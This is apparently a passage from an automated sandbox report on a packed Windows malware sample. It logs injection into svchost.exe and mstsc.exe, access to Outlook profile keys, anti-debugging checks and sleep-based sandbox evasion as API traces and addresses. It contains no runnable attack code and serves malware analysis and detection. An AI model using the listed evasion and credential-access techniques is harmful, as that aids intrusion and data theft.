            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NZuQxWwOkTbZ.exe, 00000002.00000002.4143605796.000000000047E000.00000002.00000001.01000000.00000004.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4143319289.000000000047E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DOC092024-0431202229487.exe, 00000000.00000003.1689587118.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, DOC092024-0431202229487.exe, 00000000.00000003.1689806543.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1696144266.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1693222050.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1787130944.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1789604847.000000000437A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DOC092024-0431202229487.exe, 00000000.00000003.1689587118.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, DOC092024-0431202229487.exe, 00000000.00000003.1689806543.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1696144266.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1693222050.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000003.00000002.4144953095.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1787130944.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1789604847.000000000437A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000001.00000003.1751655428.0000000006D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751502120.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1725911829.0000000004047000.00000004.00000001.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1726302794.000000000418E000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4145420454.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1855702857.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2074422264.000000001DF4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000001.00000003.1751655428.0000000006D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751502120.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1725911829.0000000004047000.00000004.00000001.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1726302794.000000000418E000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4145420454.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1855702857.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2074422264.000000001DF4C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0084B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0084B090
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077C6CC push esi; ret 0_2_0077C6CE
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073CB5D push edi; ret 0_2_0073CB5F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073CC76 push esi; ret 0_2_0073CC78
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073CE51 push esi; ret 0_2_0073CE53
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073CF3A push edi; ret 0_2_0073CF3C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00737795 push ecx; ret 0_2_007377A8
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075BB9D push FFFFFF8Bh; iretd 0_2_0075BB9F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404878 push edx; iretd 1_2_00404879
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004180CC push ss; iretd 1_2_004180D7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021FE push ecx; ret 1_2_004021FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413A18 push ebx; retf 1_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041221F push ss; ret 1_2_00412220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413A23 push ebx; retf 1_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413A2E push ebx; retf 1_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004073CB push esi; ret 1_2_004073CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403380 push eax; ret 1_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A623 push edi; retf 1_2_0040A62D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418E2B push esi; ret 1_2_00418E2C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E76A push ebp; retf 1_2_0041E858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E71E push edx; iretd 1_2_0041E71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330225F pushad ; ret 1_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033027FA pushad ; ret 1_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD push ecx; mov dword ptr [esp], ecx1_2_033309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330283D push eax; iretd 1_2_03302858
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045227FA pushad ; ret 3_2_045227F9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0452225F pushad ; ret 3_2_045227F9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0452283D push eax; iretd 3_2_04522858
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045509AD push ecx; mov dword ptr [esp], ecx3_2_045509B6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_026618CC push es; iretd 3_2_026618C5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02644048 push esi; ret 3_2_0264404B
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_026506A0 push ebx; retf 3_2_026506AA
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0072F78E
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00777F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00777F0E
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00731E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00731E5A
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeAPI/Special instruction interceptor: Address: 4D73244
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E rdtsc 1_2_0337096E
            Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 9843Jump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeEvaded block: after key decisiongraph_0-103724
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeAPI coverage: 5.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 7088Thread sleep count: 128 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 7088Thread sleep time: -256000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 7088Thread sleep count: 9843 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 7088Thread sleep time: -19686000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep time: -67500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0072DD92
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00762044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00762044
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0076219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0076219F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007624A9
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00756B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00756B3F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00756E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00756E4A
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0075F350
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075FD47 FindFirstFileW,FindClose,0_2_0075FD47
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0075FDD2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0265C460 FindFirstFileW,FindNextFileW,FindClose,3_2_0265C460
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0072E47B
            Source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
            Source: NZuQxWwOkTbZ.exe, 00000005.00000002.4143851354.000000000084F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
            Source: firefox.exe, 00000008.00000002.2076313522.00000271DDEBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeAPI call chain: ExitProcess graph end nodegraph_0-103518
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E rdtsc 1_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004176F3 LdrLoadDll,1_2_004176F3
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0076703C BlockInput,0_2_0076703C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0071374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_0071374E
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007446D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_007446D0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0084B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0084B090
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_04D734B0 mov eax, dword ptr fs:[00000030h]0_2_04D734B0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_04D73510 mov eax, dword ptr fs:[00000030h]0_2_04D73510
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_04D71E70 mov eax, dword ptr fs:[00000030h]0_2_04D71E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C310 mov ecx, dword ptr fs:[00000030h]1_2_0332C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350310 mov ecx, dword ptr fs:[00000030h]1_2_03350310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D437C mov eax, dword ptr fs:[00000030h]1_2_033D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov ecx, dword ptr fs:[00000030h]1_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA352 mov eax, dword ptr fs:[00000030h]1_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8350 mov ecx, dword ptr fs:[00000030h]1_2_033D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]1_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]1_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033663FF mov eax, dword ptr fs:[00000030h]1_2_033663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov ecx, dword ptr fs:[00000030h]1_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]1_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]1_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC3CD mov eax, dword ptr fs:[00000030h]1_2_033EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B63C0 mov eax, dword ptr fs:[00000030h]1_2_033B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332823B mov eax, dword ptr fs:[00000030h]1_2_0332823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
